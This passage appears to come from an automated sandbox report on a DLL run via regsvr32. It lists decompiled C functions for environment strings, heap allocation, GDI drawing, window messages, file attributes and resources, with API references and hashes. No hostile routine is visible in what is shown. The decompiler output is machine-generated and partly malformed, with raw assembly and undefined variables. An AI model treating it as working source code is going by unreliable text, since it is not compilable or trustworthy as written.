                                                                          • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                          • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                          • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                          • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                          • Part of subcall function 1001666B: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                          • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                          • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        • FlsSetValue.KERNEL32(00000000,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100112DB
                                                                        • GetCurrentThreadId.KERNEL32 ref: 100112EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
                                                                        • String ID:
                                                                        • API String ID: 770256606-0
                                                                        • Opcode ID: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                        • Instruction ID: a119cf37508875902a7ac88b5959fce435ef45eee062e48075b7e26cf38889a7
                                                                        • Opcode Fuzzy Hash: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                        • Instruction Fuzzy Hash: 7D31F635904312DBF728DFB08D8669A77E4EF05792F10412EF860CE552EB30EAC08B61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E10030582(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				struct tagRECT _v40;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed char _t60;
                                                                        				signed char _t65;
                                                                        				intOrPtr _t67;
                                                                        				signed int _t73;
                                                                        				void* _t76;
                                                                        				intOrPtr _t83;
                                                                        				void* _t91;
                                                                        
                                                                        				_t91 = __eflags;
                                                                        				_t76 = __ecx;
                                                                        				_v24 = 1;
                                                                        				_v20 = 1;
                                                                        				_push(GetStockObject(0));
                                                                        				_t83 = E1002934F();
                                                                        				_v16 = _t83;
                                                                        				_v8 = E10033F2F(_t83, _t91);
                                                                        				_t60 =  *(_t76 + 0x74);
                                                                        				_v12 = _t83;
                                                                        				if((0x0000a000 & _t60) == 0) {
                                                                        					__eflags = _t60 & 0x00000050;
                                                                        					if(__eflags == 0) {
                                                                        						_v24 = GetSystemMetrics(0x20) - 1;
                                                                        						_v20 = GetSystemMetrics(0x21) - 1;
                                                                        						_t65 =  *(_t76 + 0x78);
                                                                        						__eflags = 0x0000a000 & _t65;
                                                                        						if((0x0000a000 & _t65) == 0) {
                                                                        							L6:
                                                                        							__eflags = _t65 & 0x00000050;
                                                                        							if(__eflags == 0) {
                                                                        								L9:
                                                                        							} else {
                                                                        								__eflags =  *(_t76 + 0x7c);
                                                                        								if(__eflags == 0) {
                                                                        									goto L9;
                                                                        								} else {
                                                                        									goto L8;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags =  *(_t76 + 0x7c);
                                                                        							if(__eflags != 0) {
                                                                        								goto L6;
                                                                        							}
                                                                        						}
                                                                        						_v12 = _v8;
                                                                        					} else {
                                                                        					}
                                                                        				} else {
                                                                        				}
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				if(_a4 != 0) {
                                                                        					_v20 = 0;
                                                                        					_v24 = 0;
                                                                        				}
                                                                        				if(( *(_t76 + 0x75) & 0x000000f0) != 0) {
                                                                        					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                                                                        				}
                                                                        				_t95 =  *(_t76 + 0x24);
                                                                        				_t67 = _v8;
                                                                        				if( *(_t76 + 0x24) == 0) {
                                                                        					_t67 = _v16;
                                                                        				}
                                                                        				E10033FCE( *((intOrPtr*)(_t76 + 0x84)), _t95,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                                                                        				asm("movsd");
                                                                        				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                                                                        				asm("movsd");
                                                                        				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                                                                        				asm("movsd");
                                                                        				_t73 = 0 | _v12 == _v8;
                                                                        				asm("movsd");
                                                                        				 *(_t76 + 0x24) = _t73;
                                                                        				return _t73;
                                                                        			}


                                                                        APIs
                                                                        • GetStockObject.GDI32(00000000), ref: 10030598
                                                                          • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                          • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                          • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                        • String ID:
                                                                        • API String ID: 3923860780-0
                                                                        • Opcode ID: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                        • Instruction ID: 9af8668bb33911b9f969ea6b6b6f254ec0c1e141af5f513437efede38b15d734
                                                                        • Opcode Fuzzy Hash: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                        • Instruction Fuzzy Hash: BF410371D016199FDF42CFA4C980A9EBBF5EB48351F1142A5E911AB29AD370AE41CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E1002084F(void* __ecx, struct HWND__** _a4) {
                                                                        				struct HWND__** _v8;
                                                                        				struct HWND__** _v12;
                                                                        				long _t31;
                                                                        				struct HWND__** _t32;
                                                                        				struct HWND__** _t44;
                                                                        				struct HWND__** _t45;
                                                                        				long _t47;
                                                                        				void* _t49;
                                                                        				struct HWND__** _t63;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t49 = __ecx;
                                                                        				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
                                                                        					_t31 = _a4;
                                                                        					if(_t31 != 0) {
                                                                        						if( *((intOrPtr*)(_t31 + 8)) == 0) {
                                                                        							L4:
                                                                        							_t32 = E1001E0CB( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
                                                                        							_v12 = _t32;
                                                                        							_a4 = _t32;
                                                                        							E10006D96( &_a4);
                                                                        							while(_a4 != 0) {
                                                                        								_t37 =  *((intOrPtr*)(E10006D96( &_a4)));
                                                                        								_v8 =  *((intOrPtr*)(E10006D96( &_a4)));
                                                                        								if((E1002049B(_t37) & 0x00020000) != 0) {
                                                                        									break;
                                                                        								} else {
                                                                        									_t45 = _v8;
                                                                        									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
                                                                        										continue;
                                                                        									} else {
                                                                        										L16:
                                                                        										_t44 = _v8;
                                                                        										goto L17;
                                                                        									}
                                                                        								}
                                                                        								goto L18;
                                                                        							}
                                                                        							_a4 = _v12;
                                                                        							_t31 = E10006DAF( &_a4);
                                                                        							while(_a4 != 0) {
                                                                        								_t63 =  *(E10006DAF( &_a4));
                                                                        								_v8 = _t63;
                                                                        								if(_t63[2] == 0) {
                                                                        									L13:
                                                                        									_t31 = E1002049B(_t63);
                                                                        									if((_t31 & 0x00020000) == 0) {
                                                                        										continue;
                                                                        									}
                                                                        								} else {
                                                                        									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
                                                                        										goto L16;
                                                                        									} else {
                                                                        										_t63 = _v8;
                                                                        										goto L13;
                                                                        									}
                                                                        								}
                                                                        								goto L18;
                                                                        							}
                                                                        						} else {
                                                                        							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
                                                                        							_t44 = _a4;
                                                                        							if(_t47 == 1) {
                                                                        								L17:
                                                                        								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
                                                                        							} else {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						L18:
                                                                        					}
                                                                        				}
                                                                        				return _t31;
                                                                        			}

                                                                        0x1002094d
                                                                        0x10020956
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002088b
                                                                        0x10020958
                                                                        0x10020958
                                                                        0x10020868
                                                                        0x1002095c

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                        • Instruction ID: 409e1e54ae5c96ed2e58890ddbbbae16c890d09ac2c6be6a3a2fbe05691f9f0c
                                                                        • Opcode Fuzzy Hash: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                        • Instruction Fuzzy Hash: 29315C30A00219EFDB15DF55D890EAE3BAAEF45390F50806AF54A9B213DA71ED80DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10026B4F(void* __ecx, signed int* _a4) {
                                                                        				char _v12;
                                                                        				struct _FILETIME _v20;
                                                                        				struct _FILETIME _v28;
                                                                        				char _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* _t43;
                                                                        				long _t48;
                                                                        				signed int* _t51;
                                                                        				signed int* _t54;
                                                                        				signed int* _t57;
                                                                        				struct _FILETIME* _t67;
                                                                        				void* _t81;
                                                                        				CHAR* _t82;
                                                                        				signed int* _t83;
                                                                        				void* _t86;
                                                                        
                                                                        				_t83 = _a4;
                                                                        				_t81 = __ecx;
                                                                        				E10011C50(_t83, 0, 0x128);
                                                                        				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
                                                                        				_t43 =  *(_t81 + 4);
                                                                        				_t86 = _t43 -  *0x100401d4; // 0xffffffff
                                                                        				if(_t86 == 0) {
                                                                        					L12:
                                                                        					return 1;
                                                                        				}
                                                                        				_t67 =  &_v12;
                                                                        				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
                                                                        					L4:
                                                                        					return 0;
                                                                        				}
                                                                        				_t48 = GetFileSize( *(_t81 + 4), 0);
                                                                        				_t83[6] = _t48;
                                                                        				_t83[7] = 0;
                                                                        				if(_t48 != 0xffffffff || 0 != 0) {
                                                                        					_t82 =  *(_t81 + 0xc);
                                                                        					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
                                                                        						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
                                                                        					} else {
                                                                        						_t83[8] = 0;
                                                                        					}
                                                                        					_t51 = E10010239(0,  &_v36, _t82,  &_v12, 0xffffffff);
                                                                        					 *_t83 =  *_t51;
                                                                        					_t83[1] = _t51[1];
                                                                        					_t54 = E10010239(0,  &_v36, _t82,  &_v20, 0xffffffff);
                                                                        					_t83[4] =  *_t54;
                                                                        					_t83[5] = _t54[1];
                                                                        					_t57 = E10010239(0,  &_v36, _t82,  &_v28, 0xffffffff);
                                                                        					_t83[2] =  *_t57;
                                                                        					_t83[3] = _t57[1];
                                                                        					if(( *_t83 | _t83[1]) == 0) {
                                                                        						 *_t83 =  *_t57;
                                                                        						_t83[1] = _t57[1];
                                                                        					}
                                                                        					if((_t83[4] | _t83[5]) == 0) {
                                                                        						_t83[4] = _t83[2];
                                                                        						_t83[5] = _t83[3];
                                                                        					}
                                                                        					goto L12;
                                                                        				} else {
                                                                        					goto L4;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • lstrcpynA.KERNEL32(?,?,00000104), ref: 10026B7A
                                                                        • GetFileTime.KERNEL32(?,?,?,?), ref: 10026B9C
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 10026BAA
                                                                        • GetFileAttributesA.KERNEL32(?), ref: 10026BD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesSizeTimelstrcpyn
                                                                        • String ID:
                                                                        • API String ID: 1499663573-0
                                                                        • Opcode ID: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                        • Instruction ID: a18b0f555d231170b7735eacb595d982f5b9ad02e146dd108c4f4c0e1a6c5240
                                                                        • Opcode Fuzzy Hash: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                        • Instruction Fuzzy Hash: 06419CB56006059FC724DFA4DD84CAABBF8FF093103508A2EE1A6D76A0E730F944CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 29%
                                                                        			E1000C29A(void* _a4, intOrPtr _a8) {
                                                                        				char _v8;
                                                                        				char _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				char _v56;
                                                                        				char _v60;
                                                                        				intOrPtr _t39;
                                                                        				intOrPtr* _t41;
                                                                        				intOrPtr* _t47;
                                                                        				intOrPtr _t48;
                                                                        				intOrPtr* _t49;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr* _t60;
                                                                        				void* _t71;
                                                                        
                                                                        				_t71 = _a4 + 0xffffff2c;
                                                                        				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
                                                                        					return 0;
                                                                        				}
                                                                        				_t58 = _a8;
                                                                        				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
                                                                        					L4:
                                                                        					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
                                                                        						__imp__#9(_t71 + 0xa8);
                                                                        						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
                                                                        						_push( &_a4);
                                                                        						_push(0x10043098);
                                                                        						_a4 = 0;
                                                                        						_push(_t41);
                                                                        						if( *((intOrPtr*)( *_t41))() >= 0) {
                                                                        							E10011C50( &_v56, 0, 0x20);
                                                                        							E10011C50( &_v24, 0, 0x10);
                                                                        							_t47 = _a4;
                                                                        							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x10043018, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
                                                                        							_t60 = __imp__#6;
                                                                        							_a8 = _t48;
                                                                        							if(_v52 != 0) {
                                                                        								 *_t60(_v52);
                                                                        							}
                                                                        							if(_v48 != 0) {
                                                                        								 *_t60(_v48);
                                                                        							}
                                                                        							if(_v44 != 0) {
                                                                        								 *_t60(_v44);
                                                                        							}
                                                                        							_t49 = _a4;
                                                                        							 *((intOrPtr*)( *_t49 + 8))(_t49);
                                                                        							if(_a8 >= 0) {
                                                                        								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_t39 = 0;
                                                                        					goto L15;
                                                                        				} else {
                                                                        					_v60 = 2;
                                                                        					_v56 = _t58;
                                                                        					_v52 = 0;
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v36 = 0;
                                                                        					_v32 = 0;
                                                                        					_v28 = 0;
                                                                        					E1000A823(_t71,  &_v60);
                                                                        					_t39 = _v36;
                                                                        					if(_t39 != 0) {
                                                                        						L15:
                                                                        						return _t39;
                                                                        					}
                                                                        					goto L4;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: FreeString$ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 3349467263-0
                                                                        • Opcode ID: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                        • Instruction ID: 552477abdee19e13ea1b462c0c8e49e77f6f834a68e9ea303e894a8b6247ec6d
                                                                        • Opcode Fuzzy Hash: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                        • Instruction Fuzzy Hash: E3310571A10229BFDB04DFA5C884EDEBBB9FF08790F10811AF559A6245C770AA54CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E10036A6D(intOrPtr __ecx, CHAR* _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _v12;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				struct HRSRC__* _t22;
                                                                        				signed short _t23;
                                                                        				void* _t24;
                                                                        				signed int _t29;
                                                                        				signed short _t31;
                                                                        				void* _t37;
                                                                        				signed short _t38;
                                                                        				signed short* _t47;
                                                                        				void* _t53;
                                                                        				struct HINSTANCE__* _t56;
                                                                        				void* _t58;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_v8 = __ecx;
                                                                        				_t56 =  *(E100373B5() + 0xc);
                                                                        				_t22 = FindResourceA(_t56, _a4, 0xf1);
                                                                        				if(_t22 == 0) {
                                                                        					L3:
                                                                        					_t23 = 0;
                                                                        				} else {
                                                                        					_t24 = LoadResource(_t56, _t22);
                                                                        					_v12 = _t24;
                                                                        					if(_t24 == 0) {
                                                                        						goto L3;
                                                                        					} else {
                                                                        						_t58 = LockResource(_t24);
                                                                        						if(_t58 != 0) {
                                                                        							_push(_t37);
                                                                        							_t53 = E1001F77E(( *(_t58 + 6) & 0x0000ffff) << 2);
                                                                        							_t29 = 0;
                                                                        							__eflags =  *(_t58 + 6);
                                                                        							if( *(_t58 + 6) > 0) {
                                                                        								_t7 = _t58 + 8; // 0x8
                                                                        								_t47 = _t7;
                                                                        								do {
                                                                        									 *(_t53 + _t29 * 4) =  *_t47 & 0x0000ffff;
                                                                        									_t29 = _t29 + 1;
                                                                        									_t47 =  &(_t47[1]);
                                                                        									__eflags = _t29 - ( *(_t58 + 6) & 0x0000ffff);
                                                                        								} while (_t29 < ( *(_t58 + 6) & 0x0000ffff));
                                                                        							}
                                                                        							_t31 = E100366B1(_t37, _v8, _t53, _t58, _t53,  *(_t58 + 6) & 0x0000ffff);
                                                                        							_push(_t53);
                                                                        							_t38 = _t31;
                                                                        							L1001F7A9(_t38, _t53, _t58, __eflags);
                                                                        							__eflags = _t38;
                                                                        							if(_t38 != 0) {
                                                                        								_t44 =  *(_t58 + 4) & 0x0000ffff;
                                                                        								E100368F3(_v8, ( *(_t58 + 2) & 0x0000ffff) + 7, ( *(_t58 + 4) & 0x0000ffff) + 7,  *(_t58 + 2) & 0x0000ffff, _t44);
                                                                        								_t38 = E1003697A(_v8, _a4);
                                                                        							}
                                                                        							FreeResource(_v12);
                                                                        							_t23 = _t38;
                                                                        						} else {
                                                                        							goto L3;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t23;
                                                                        			}





















                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,000000F1), ref: 10036A87
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 10036A93
                                                                        • LockResource.KERNEL32(00000000), ref: 10036AA1
                                                                        • FreeResource.KERNEL32(?), ref: 10036B24
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLock
                                                                        • String ID:
                                                                        • API String ID: 1078018258-0
                                                                        • Opcode ID: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                        • Instruction ID: 90f7a23fa8f058c3dd6ac9528b305ebca7cc9ac8441aa778f718171523645421
                                                                        • Opcode Fuzzy Hash: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                        • Instruction Fuzzy Hash: 6321B375500621AED716DFA1CC84CBBB7ECEF48642B00C429F946DB251EB30ED41DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E1002C73E(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a12) {
                                                                        				intOrPtr _v12;
                                                                        				char _v16;
                                                                        				struct tagRECT _v32;
                                                                        				struct HDC__* _v44;
                                                                        				char _v52;
                                                                        				struct tagTEXTMETRICA _v108;
                                                                        				void* __ebp;
                                                                        				long _t25;
                                                                        				int _t35;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t43;
                                                                        				intOrPtr _t53;
                                                                        				intOrPtr* _t59;
                                                                        				intOrPtr _t60;
                                                                        
                                                                        				_t59 = __ecx;
                                                                        				_push(0);
                                                                        				E100290F7( &_v52);
                                                                        				_t25 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
                                                                        				_t43 = 0;
                                                                        				if(_t25 != 0) {
                                                                        					_t43 = E1000866D( &_v52, _t25);
                                                                        				}
                                                                        				GetTextMetricsA(_v44,  &_v108);
                                                                        				_t62 = _t43;
                                                                        				if(_t43 != 0) {
                                                                        					E1000866D( &_v52, _t43);
                                                                        				}
                                                                        				E10029152( &_v52, _t62);
                                                                        				SetRectEmpty( &_v32);
                                                                        				 *((intOrPtr*)( *_t59 + 0x13c))( &_v32, _a12);
                                                                        				 *((intOrPtr*)( *_t59 + 0x110))(0x407, 0,  &_v16);
                                                                        				_t35 = GetSystemMetrics(6);
                                                                        				_t60 =  *((intOrPtr*)(_t59 + 0x90));
                                                                        				_t53 = (_t35 + _v12 << 1) - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
                                                                        				if(_t53 < _t60) {
                                                                        					_t53 = _t60;
                                                                        				}
                                                                        				_t40 = _a4;
                                                                        				 *_t40 = 0x7fff;
                                                                        				 *((intOrPtr*)(_t40 + 4)) = _t53;
                                                                        				return _t40;
                                                                        			}


















                                                                        APIs
                                                                          • Part of subcall function 100290F7: __EH_prolog.LIBCMT ref: 100290FC
                                                                          • Part of subcall function 100290F7: GetDC.USER32(00000000), ref: 1002912A
                                                                        • SendMessageA.USER32 ref: 1002C75B
                                                                        • GetTextMetricsA.GDI32(?,?), ref: 1002C779
                                                                        • SetRectEmpty.USER32(?), ref: 1002C798
                                                                        • GetSystemMetrics.USER32 ref: 1002C7D0
                                                                          • Part of subcall function 1000866D: SelectObject.GDI32(?,?), ref: 1000867C
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Metrics$EmptyH_prologMessageObjectRectSelectSendSystemText
                                                                        • String ID:
                                                                        • API String ID: 1847300772-0
                                                                        • Opcode ID: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                        • Instruction ID: 7e47f88f2f58757794e6d6d0f1f8ec1525fff8c624cfc69816e05b16ce6d54a2
                                                                        • Opcode Fuzzy Hash: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                        • Instruction Fuzzy Hash: 67217936A00218AFDB15DFA8DC89CEEBBB9FF88700F414529F512A7291DB717945CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10034B35(intOrPtr __ecx) {
                                                                        				void* _v8;
                                                                        				char _v12;
                                                                        				int _v16;
                                                                        				intOrPtr _v20;
                                                                        				int _v24;
                                                                        				char* _t32;
                                                                        				intOrPtr _t34;
                                                                        				char** _t35;
                                                                        				signed int _t40;
                                                                        				char** _t44;
                                                                        				char* _t46;
                                                                        
                                                                        				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
                                                                        				_t46 =  *0x1004b390; // 0x1003d660
                                                                        				_v20 = __ecx;
                                                                        				_v8 = 0;
                                                                        				_v12 = 0;
                                                                        				_v24 = 4;
